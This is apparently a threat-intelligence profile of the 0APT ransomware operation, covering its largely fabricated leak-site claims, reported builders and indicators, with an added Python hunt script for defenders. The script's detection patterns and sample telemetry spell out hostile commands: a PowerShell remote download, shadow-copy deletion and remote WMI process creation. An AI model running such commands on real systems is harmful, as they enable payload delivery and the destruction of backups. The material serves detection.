0APT
0APT is a purported ransomware operation that surfaced on dark web forums in late January 2026, marketing itself as a Ransomware-as-a-Service (RaaS) with a professional-looking ecosystem (vanity TOR data leak site, RaaS panel, and negotiation chat). Multiple investigations (including GuidePoint Security, Halcyon, SOCRadar, THE RAVEN FILE, and Intel 471) assessed that 0APT’s claimed victim list and “stolen data” were largely fabricated—e.g., implausible multi-terabyte “file trees,” downloads that terminated after ~5 minutes, and samples that contained repeating null bytes—suggesting the operation was primarily designed to scam would-be affiliates (reportedly defrauding at least $85,000) rather than extort real organizations. Some named victims publicly denied compromise (e.g., Epworth HealthCare), and at least one listed entity was fictional (e.g., “Metropolis City Municipal”).
Despite the apparent fraud around the breach claims, researchers who accessed the RaaS panel reported that it could generate functional ransomware samples (up to five builds per affiliate account) for Windows, Linux, and macOS. Generated samples were described as Rust-compiled on Windows (~5.6MB), with the Linux build at ~1.3MB, using encryption algorithms including AES-256 and Salsa20/ChaCha and referencing the Speck cipher. The ransomware appends the .0apt extension to encrypted files and drops a ransom note named README0apt.txt containing unique victim identifiers. Intel 471 reported an alleged 0APT malware sample but assessed that it appeared to be a work in progress rather than fully operational ransomware, while noting a small possibility that the actor was testing infrastructure and capabilities for future activity.
Known/mentioned indicators and behaviors from reporting include: file extension “.0apt”; ransom note “README0apt.txt”; and (as recommended hunt focus areas associated with claimed 0APT activity) suspicious PowerShell execution-policy changes to Unrestricted, PowerShell-based file download methods, WMI remote command attempts, nonstandard SMB communication/profiling, SMB share/admin share activity, WinRAR archive creation, and shadow copy deletion via OS utilities.
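As an added example (not from the page's sources or from Mallory), the hunt focus areas above expressed as a small Python triage over constructed process and file telemetry; the regex patterns, the event schema and the sample events are our own assumptions, written for Sysmon/EDR-style records.

```python
import re
from typing import Dict, List
# Added example, not from the page or any vendor tool: hunt rules mirroring the
# 0APT-associated focus areas in public reporting. Patterns/schema are assumptions.
PROCESS_RULES = {
    # Execution-policy change to Unrestricted (cmdlet or command-line switch)
    "ps_execpolicy_unrestricted": re.compile(
        r"(set-executionpolicy|-executionpolicy|-ep)\s+unrestricted", re.I),
    # PowerShell-based file download methods
    "ps_download": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient", re.I),
    # WMI remote command attempts against another host
    "wmi_remote_command": re.compile(
        r"wmic(\.exe)?\s+/node:\S+.*process\s+call\s+create|invoke-wmimethod.*-computername", re.I),
    # WinRAR archive creation ("a" = add files to archive)
    "winrar_archive_create": re.compile(r'\b(winrar|rar)(\.exe)?"?\s+a\s', re.I),
    # Shadow copy deletion via built-in OS utilities
    "shadow_copy_deletion": re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
}
FILE_RULES = {
    "0apt_extension": re.compile(r"\.0apt$", re.I),  # encrypted-file extension
    "0apt_ransom_note": re.compile(r"(^|[\\/])README0apt\.txt$", re.I),  # ransom note
}

def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per (event, rule) hit. An event is a dict with 'type'
    ('process' or 'file'), 'host', and 'cmdline' (process) or 'path' (file)."""
    findings = []
    for ev in events:
        if ev.get("type") == "process":
            rules, subject = PROCESS_RULES, ev.get("cmdline", "")
        elif ev.get("type") == "file":
            rules, subject = FILE_RULES, ev.get("path", "")
        else:
            continue  # unknown event type: skip rather than guess
        for name, pattern in rules.items():
            if pattern.search(subject):
                findings.append({"host": ev["host"], "rule": name, "evidence": subject})
    return findings

# Constructed sample telemetry for demonstration; not real victim data.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "cmdline": "powershell.exe -ep Unrestricted -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""},
    {"type": "process", "host": "srv02", "cmdline": "wmic /node:srv03 process call create \"cmd.exe /c whoami\""},
    {"type": "process", "host": "srv02", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"type": "process", "host": "ws01", "cmdline": "\"C:\\Program Files\\WinRAR\\WinRAR.exe\" a -r staging.rar D:\\Finance"},
    {"type": "file", "host": "ws01", "path": "C:\\Users\\alice\\Documents\\budget.xlsx.0apt"},
    {"type": "file", "host": "ws01", "path": "C:\\Users\\alice\\Desktop\\README0apt.txt"},
    {"type": "process", "host": "ws03", "cmdline": "notepad.exe notes.txt"},  # benign control
]
```

Running `hunt(SAMPLE_EVENTS)` yields seven findings: the first PowerShell event trips both the execution-policy and download rules, each of the other suspicious events trips one rule, and the benign control yields nothing.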
Groups observed using it
1 distinct threat actor attributed by public researchers.
"Intel 471 discovered the alleged 0APT malware sample... technical analysis of the malicious file indicated it was more of a work in progress than a fully operational ransomware malware sample."
Recent activity
2 sources tracked across advisories, community write-ups, and news.
RaaS operation that provides functional cross-platform ransomware builders (Windows/Linux/macOS). Payloads append the .0apt extension and drop a ransom note (README0apt.txt) with unique victim identifiers. The operation’s leak site and claimed victim list appear largely fabricated, likely to defraud would-be affiliates, but the ransomware binaries themselves are described as functional and in circulation.
An alleged ransomware payload associated with the 0APT actor's purported RaaS operation; reporting indicates that the sample and the supporting leak-site "proof" appear non-credible or fabricated, and that the malware may be incomplete or still in development rather than an operational encryptor.